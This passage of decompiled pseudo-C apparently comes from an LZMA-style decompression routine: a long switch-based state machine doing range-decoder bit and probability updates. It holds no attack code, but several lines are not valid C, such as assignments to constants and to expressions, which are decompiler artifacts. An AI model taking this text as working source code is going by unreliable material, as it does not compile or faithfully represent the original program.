                                  											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                  											goto L132;
                                  										case 3:
                                  											L21:
                                  											__eflags =  *(_t612 - 0x6c);
                                  											if( *(_t612 - 0x6c) == 0) {
                                  												 *(_t612 - 0x88) = 3;
                                  												goto L170;
                                  											}
                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                  											_t67 = _t612 - 0x70;
                                  											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                  											__eflags =  *_t67;
                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                  											L23:
                                  											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                  											if( *(_t612 - 0x48) != 0) {
                                  												goto L21;
                                  											}
                                  											goto L24;
                                  										case 4:
                                  											L133:
                                  											_t531 =  *_t605;
                                  											_t588 = _t531 & 0x0000ffff;
                                  											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                  											if( *(_t612 - 0xc) >= _t564) {
                                  												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                  												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                  												 *(_t612 - 0x40) = 1;
                                  												_t532 = _t531 - (_t531 >> 5);
                                  												__eflags = _t532;
                                  												 *_t605 = _t532;
                                  											} else {
                                  												 *(_t612 - 0x10) = _t564;
                                  												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                  												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                  											}
                                  											if( *(_t612 - 0x10) >= 0x1000000) {
                                  												goto L139;
                                  											} else {
                                  												goto L137;
                                  											}
                                  										case 5:
                                  											L137:
                                  											if( *(_t612 - 0x6c) == 0) {
                                  												 *(_t612 - 0x88) = 5;
                                  												goto L170;
                                  											}
                                  											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                  											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                  											L139:
                                  											_t533 =  *(_t612 - 0x84);
                                  											goto L140;
                                  										case 6:
                                  											__edx = 0;
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x34) = 1;
                                  												 *(__ebp - 0x84) = 7;
                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                  												goto L132;
                                  											}
                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                  											__esi =  *(__ebp - 0x60);
                                  											__cl = 8;
                                  											__cl = 8 -  *(__ebp - 0x3c);
                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                  											__ecx =  *(__ebp - 0x3c);
                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                  											__ecx =  *(__ebp - 4);
                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                  											__eflags =  *(__ebp - 0x38) - 4;
                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                  											if( *(__ebp - 0x38) >= 4) {
                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                  												if( *(__ebp - 0x38) >= 0xa) {
                                  													_t98 = __ebp - 0x38;
                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                  													__eflags =  *_t98;
                                  												} else {
                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                  												}
                                  											} else {
                                  												 *(__ebp - 0x38) = 0;
                                  											}
                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                  											if( *(__ebp - 0x34) == __edx) {
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												goto L61;
                                  											} else {
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__ecx =  *(__ebp - 8);
                                  												__ebx = 0;
                                  												__ebx = 1;
                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                  												goto L41;
                                  											}
                                  										case 7:
                                  											__eflags =  *(__ebp - 0x40) - 1;
                                  											if( *(__ebp - 0x40) != 1) {
                                  												__eax =  *(__ebp - 0x24);
                                  												 *(__ebp - 0x80) = 0x16;
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x28);
                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  												__eax =  *(__ebp - 0x2c);
                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  												__eax = 0;
                                  												__eflags =  *(__ebp - 0x38) - 7;
                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  												__al = __al & 0x000000fd;
                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                  												__eax =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 4) + 0x664;
                                  												__eflags = __eax;
                                  												 *(__ebp - 0x58) = __eax;
                                  												goto L69;
                                  											}
                                  											__eax =  *(__ebp - 4);
                                  											__ecx =  *(__ebp - 0x38);
                                  											 *(__ebp - 0x84) = 8;
                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                  											goto L132;
                                  										case 8:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xa;
                                  												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                  											} else {
                                  												__eax =  *(__ebp - 0x38);
                                  												__ecx =  *(__ebp - 4);
                                  												__eax =  *(__ebp - 0x38) + 0xf;
                                  												 *(__ebp - 0x84) = 9;
                                  												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                  												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                  											}
                                  											goto L132;
                                  										case 9:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												goto L90;
                                  											}
                                  											__eflags =  *(__ebp - 0x60);
                                  											if( *(__ebp - 0x60) == 0) {
                                  												goto L171;
                                  											}
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                  											__eflags = _t259;
                                  											0 | _t259 = _t259 + _t259 + 9;
                                  											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                  											goto L76;
                                  										case 0xa:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__eax =  *(__ebp - 4);
                                  												__ecx =  *(__ebp - 0x38);
                                  												 *(__ebp - 0x84) = 0xb;
                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                  												goto L132;
                                  											}
                                  											__eax =  *(__ebp - 0x28);
                                  											goto L89;
                                  										case 0xb:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												__ecx =  *(__ebp - 0x24);
                                  												__eax =  *(__ebp - 0x20);
                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                  											} else {
                                  												__eax =  *(__ebp - 0x24);
                                  											}
                                  											__ecx =  *(__ebp - 0x28);
                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                  											L89:
                                  											__ecx =  *(__ebp - 0x2c);
                                  											 *(__ebp - 0x2c) = __eax;
                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                  											L90:
                                  											__eax =  *(__ebp - 4);
                                  											 *(__ebp - 0x80) = 0x15;
                                  											__eax =  *(__ebp - 4) + 0xa68;
                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                  											goto L69;
                                  										case 0xc:
                                  											L100:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xc;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t335 = __ebp - 0x70;
                                  											 *_t335 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t335;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											__eax =  *(__ebp - 0x2c);
                                  											goto L102;
                                  										case 0xd:
                                  											L37:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xd;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t122 = __ebp - 0x70;
                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t122;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L39:
                                  											__eax =  *(__ebp - 0x40);
                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                  												goto L48;
                                  											}
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												goto L54;
                                  											}
                                  											L41:
                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                  											 *(__ebp - 0x48) = __eax;
                                  											__eax = __eax + 1;
                                  											__eax = __eax << 8;
                                  											__eax = __eax + __ebx;
                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edx = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												 *(__ebp - 0x40) = 1;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												__ebx = __ebx + __ebx + 1;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edx;
                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L39;
                                  											} else {
                                  												goto L37;
                                  											}
                                  										case 0xe:
                                  											L46:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xe;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t156 = __ebp - 0x70;
                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t156;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											while(1) {
                                  												L48:
                                  												__eflags = __ebx - 0x100;
                                  												if(__ebx >= 0x100) {
                                  													break;
                                  												}
                                  												__eax =  *(__ebp - 0x58);
                                  												__edx = __ebx + __ebx;
                                  												__ecx =  *(__ebp - 0x10);
                                  												__esi = __edx + __eax;
                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                  												__ax =  *__esi;
                                  												 *(__ebp - 0x54) = __esi;
                                  												__edi = __ax & 0x0000ffff;
                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                  												if( *(__ebp - 0xc) >= __ecx) {
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  													__cx = __ax;
                                  													_t170 = __edx + 1; // 0x1
                                  													__ebx = _t170;
                                  													__cx = __ax >> 5;
                                  													__eflags = __eax;
                                  													 *__esi = __ax;
                                  												} else {
                                  													 *(__ebp - 0x10) = __ecx;
                                  													0x800 = 0x800 - __edi;
                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  													__ebx = __ebx + __ebx;
                                  													 *__esi = __cx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													continue;
                                  												} else {
                                  													goto L46;
                                  												}
                                  											}
                                  											L54:
                                  											_t173 = __ebp - 0x34;
                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                  											__eflags =  *_t173;
                                  											goto L55;
                                  										case 0xf:
                                  											L58:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0xf;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t203 = __ebp - 0x70;
                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t203;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L60:
                                  											__eflags = __ebx - 0x100;
                                  											if(__ebx >= 0x100) {
                                  												L55:
                                  												__al =  *(__ebp - 0x44);
                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                  												goto L56;
                                  											}
                                  											L61:
                                  											__eax =  *(__ebp - 0x58);
                                  											__edx = __ebx + __ebx;
                                  											__ecx =  *(__ebp - 0x10);
                                  											__esi = __edx + __eax;
                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                  											__ax =  *__esi;
                                  											 *(__ebp - 0x54) = __esi;
                                  											__edi = __ax & 0x0000ffff;
                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                  											if( *(__ebp - 0xc) >= __ecx) {
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                  												__cx = __ax;
                                  												_t217 = __edx + 1; // 0x1
                                  												__ebx = _t217;
                                  												__cx = __ax >> 5;
                                  												__eflags = __eax;
                                  												 *__esi = __ax;
                                  											} else {
                                  												 *(__ebp - 0x10) = __ecx;
                                  												0x800 = 0x800 - __edi;
                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  												__ebx = __ebx + __ebx;
                                  												 *__esi = __cx;
                                  											}
                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L60;
                                  											} else {
                                  												goto L58;
                                  											}
                                  										case 0x10:
                                  											L110:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0x10;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t366 = __ebp - 0x70;
                                  											 *_t366 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t366;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											goto L112;
                                  										case 0x11:
                                  											L69:
                                  											__esi =  *(__ebp - 0x58);
                                  											 *(__ebp - 0x84) = 0x12;
                                  											L132:
                                  											 *(_t612 - 0x54) = _t605;
                                  											goto L133;
                                  										case 0x12:
                                  											goto L0;
                                  										case 0x13:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												_t469 = __ebp - 0x58;
                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  												__eflags =  *_t469;
                                  												 *(__ebp - 0x30) = 0x10;
                                  												 *(__ebp - 0x40) = 8;
                                  												goto L144;
                                  											}
                                  											__eax =  *(__ebp - 0x4c);
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax =  *(__ebp - 0x4c) << 4;
                                  											 *(__ebp - 0x30) = 8;
                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  											goto L130;
                                  										case 0x14:
                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  											__eax =  *(__ebp - 0x80);
                                  											L140:
                                  											 *(_t612 - 0x88) = _t533;
                                  											goto L1;
                                  										case 0x15:
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  											__al = __al & 0x000000fd;
                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  											goto L121;
                                  										case 0x16:
                                  											__eax =  *(__ebp - 0x30);
                                  											__eflags = __eax - 4;
                                  											if(__eax >= 4) {
                                  												_push(3);
                                  												_pop(__eax);
                                  											}
                                  											__ecx =  *(__ebp - 4);
                                  											 *(__ebp - 0x40) = 6;
                                  											__eax = __eax << 7;
                                  											 *(__ebp - 0x7c) = 0x19;
                                  											 *(__ebp - 0x58) = __eax;
                                  											goto L145;
                                  										case 0x17:
                                  											goto L145;
                                  										case 0x18:
                                  											L146:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												 *(__ebp - 0x88) = 0x18;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t484 = __ebp - 0x70;
                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t484;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											L148:
                                  											_t487 = __ebp - 0x48;
                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                  											__eflags =  *_t487;
                                  											goto L149;
                                  										case 0x19:
                                  											__eflags = __ebx - 4;
                                  											if(__ebx < 4) {
                                  												 *(__ebp - 0x2c) = __ebx;
                                  												L120:
                                  												_t394 = __ebp - 0x2c;
                                  												 *_t394 =  *(__ebp - 0x2c) + 1;
                                  												__eflags =  *_t394;
                                  												L121:
                                  												__eax =  *(__ebp - 0x2c);
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  													goto L170;
                                  												}
                                  												__eflags = __eax -  *(__ebp - 0x60);
                                  												if(__eax >  *(__ebp - 0x60)) {
                                  													goto L171;
                                  												}
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  												__eax =  *(__ebp - 0x30);
                                  												_t401 = __ebp - 0x60;
                                  												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  												__eflags =  *_t401;
                                  												goto L124;
                                  											}
                                  											__ecx = __ebx;
                                  											__eax = __ebx;
                                  											__ecx = __ebx >> 1;
                                  											__eax = __ebx & 0x00000001;
                                  											__ecx = (__ebx >> 1) - 1;
                                  											__al = __al | 0x00000002;
                                  											__eax = (__ebx & 0x00000001) << __cl;
                                  											__eflags = __ebx - 0xe;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__ebx >= 0xe) {
                                  												__ebx = 0;
                                  												 *(__ebp - 0x48) = __ecx;
                                  												L103:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													__eax = __eax + __ebx;
                                  													 *(__ebp - 0x40) = 4;
                                  													 *(__ebp - 0x2c) = __eax;
                                  													__eax =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 4) + 0x644;
                                  													__eflags = __eax;
                                  													L109:
                                  													__ebx = 0;
                                  													 *(__ebp - 0x58) = __eax;
                                  													 *(__ebp - 0x50) = 1;
                                  													 *(__ebp - 0x44) = 0;
                                  													 *(__ebp - 0x48) = 0;
                                  													L113:
                                  													__eax =  *(__ebp - 0x40);
                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  														_t392 = __ebp - 0x2c;
                                  														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                                  														__eflags =  *_t392;
                                  														goto L120;
                                  													}
                                  													__eax =  *(__ebp - 0x50);
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  													__eax =  *(__ebp - 0x58);
                                  													__esi = __edi + __eax;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__ax =  *__esi;
                                  													__ecx = __ax & 0x0000ffff;
                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                  													if( *(__ebp - 0xc) >= __edx) {
                                  														__ecx = 0;
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  														__ecx = 1;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  														__ebx = 1;
                                  														__ecx =  *(__ebp - 0x48);
                                  														__ebx = 1 << __cl;
                                  														__ecx = 1 << __cl;
                                  														__ebx =  *(__ebp - 0x44);
                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                  														__cx = __ax;
                                  														__cx = __ax >> 5;
                                  														__eax = __eax - __ecx;
                                  														__edi = __edi + 1;
                                  														__eflags = __edi;
                                  														 *(__ebp - 0x44) = __ebx;
                                  														 *__esi = __ax;
                                  														 *(__ebp - 0x50) = __edi;
                                  													} else {
                                  														 *(__ebp - 0x10) = __edx;
                                  														0x800 = 0x800 - __ecx;
                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  														 *__esi = __dx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L112:
                                  														_t369 = __ebp - 0x48;
                                  														 *_t369 =  *(__ebp - 0x48) + 1;
                                  														__eflags =  *_t369;
                                  														goto L113;
                                  													} else {
                                  														goto L110;
                                  													}
                                  												}
                                  												__ecx =  *(__ebp - 0xc);
                                  												__ebx = __ebx + __ebx;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  													__ecx =  *(__ebp - 0x10);
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													__ebx = __ebx | 0x00000001;
                                  													__eflags = __ebx;
                                  													 *(__ebp - 0x44) = __ebx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													L102:
                                  													_t339 = __ebp - 0x48;
                                  													 *_t339 =  *(__ebp - 0x48) - 1;
                                  													__eflags =  *_t339;
                                  													goto L103;
                                  												} else {
                                  													goto L100;
                                  												}
                                  											}
                                  											__edx =  *(__ebp - 4);
                                  											__eax = __eax - __ebx;
                                  											 *(__ebp - 0x40) = __ecx;
                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  											goto L109;
                                  										case 0x1a:
                                  											L56:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												 *(__ebp - 0x88) = 0x1a;
                                  												goto L170;
                                  											}
                                  											__ecx =  *(__ebp - 0x68);
                                  											__al =  *(__ebp - 0x5c);
                                  											__edx =  *(__ebp - 8);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  											 *( *(__ebp - 0x68)) = __al;
                                  											__ecx =  *(__ebp - 0x14);
                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                  											__eax = __ecx + 1;
                                  											__edx = 0;
                                  											_t192 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t192;
                                  											goto L80;
                                  										case 0x1b:
                                  											L76:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												 *(__ebp - 0x88) = 0x1b;
                                  												goto L170;
                                  											}
                                  											__eax =  *(__ebp - 0x14);
                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
